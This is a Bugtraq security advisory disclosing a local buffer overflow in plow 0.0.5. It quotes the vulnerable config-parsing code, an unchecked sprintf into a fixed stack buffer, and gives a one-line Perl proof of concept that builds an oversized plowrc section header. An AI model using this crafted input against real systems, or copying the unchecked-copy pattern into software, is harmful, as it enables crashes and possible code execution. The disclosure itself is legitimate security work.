[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201207031211.q63CBdur023183@sf01web1.securityfocus.com>
Date: Tue, 3 Jul 2012 12:11:39 GMT
From: pereira@...biz.de
To: bugtraq@...urityfocus.com
Subject: plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
Discovered by: Jean Pascal Pereira <pereira@...biz.de>
Vendor information:
"plow is a command line playlist generator."
Vendor URI: http://developer.berlios.de/projects/plow/
#################################################
Risk-level: Medium
The application is prone to a local buffer overflow vulnerability.
-------------------------------------
IniParser.cpp, line 26:
26: char buffer[length];
27: char group [length];
28:
29: char *option;
30: char *value;
31:
32: while(ini.getline(buffer, length)) {
33: if(!strlen(buffer) || buffer[0] == '#') {
34: continue;
35: }
36: if(buffer[0] == '[') {
37: if(buffer[strlen(buffer) - 1] == ']') {
38: sprintf(group, "%s", buffer);
39: } else {
40: err = 1;
41: break;
42: }
43: }
-------------------------------------
Exploit / Proof Of Concept:
Create a crafted plowrc file:
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc
-------------------------------------
Solution:
Do some input validation.
-------------------------------------
#################################################
Powered by blists - more mailing lists